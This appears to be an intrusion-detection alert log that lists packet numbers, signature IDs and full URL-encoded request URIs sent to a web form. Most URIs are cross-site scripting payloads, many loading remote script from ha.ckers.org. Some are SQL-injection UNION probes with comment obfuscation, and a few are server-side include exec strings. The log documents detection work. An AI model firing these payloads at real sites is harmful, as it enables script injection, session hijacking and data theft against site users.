Packet [309]	Uri [/web/?demo-email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [310]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [311]	Uri [/web/?demo-email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [312]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [313]	Uri [/web/?demo-email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [314]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [315]	Uri [/web/?demo-email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [316]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [317]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [318]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [319]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [320]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [321]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [322]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [323]	Uri [/web/?demo-email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [324]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [325]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [329]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [330]	Uri [/web/?demo-email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-priority=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [378]	Uri [/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [379]	Uri [/web/?demo-email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-priority=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&demo-copy=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&email=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE&]	Nattacks [1]	Signatures	[2006445]
Packet [406]	Uri [/web/?demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [409]	Uri [/web/?demo-human=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [410]	Uri [/web/?demo-human=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [411]	Uri [/web/?demo-human=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [412]	Uri [/web/?demo-human=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [413]	Uri [/web/?demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [442]	Uri [/web/?demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [446]	Uri [/web/?demo-human=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [478]	Uri [/web/?demo-human=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [481]	Uri [/web/?demo-human=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [482]	Uri [/web/?demo-human=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [483]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [484]	Uri [/web/?demo-human=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [485]	Uri [/web/?demo-human=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [486]	Uri [/web/?demo-human=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [487]	Uri [/web/?demo-human=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [488]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [489]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [490]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [491]	Uri [/web/?demo-human=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [492]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [495]	Uri [/web/?demo-human=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [520]	Uri [/web/?demo-human=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [538]	Uri [/web/?demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [541]	Uri [/web/?demo-name=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [542]	Uri [/web/?demo-name=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [543]	Uri [/web/?demo-name=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [544]	Uri [/web/?demo-name=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [545]	Uri [/web/?demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [574]	Uri [/web/?demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [578]	Uri [/web/?demo-name=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [610]	Uri [/web/?demo-name=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [613]	Uri [/web/?demo-name=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [614]	Uri [/web/?demo-name=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [615]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [616]	Uri [/web/?demo-name=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [617]	Uri [/web/?demo-name=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [618]	Uri [/web/?demo-name=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [619]	Uri [/web/?demo-name=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [620]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [621]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [622]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [623]	Uri [/web/?demo-name=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [624]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [627]	Uri [/web/?demo-name=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [652]	Uri [/web/?demo-name=1+UNI%2F%2A%2A%2FON+SELECT+ALL+FROM+WHERE]	Nattacks [1]	Signatures	[2006445]
Packet [669]	Uri [/web/?demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [672]	Uri [/web/?demo-priority=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [673]	Uri [/web/?demo-priority=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [674]	Uri [/web/?demo-priority=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [675]	Uri [/web/?demo-priority=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [676]	Uri [/web/?demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [705]	Uri [/web/?demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [709]	Uri [/web/?demo-priority=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [741]	Uri [/web/?demo-priority=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
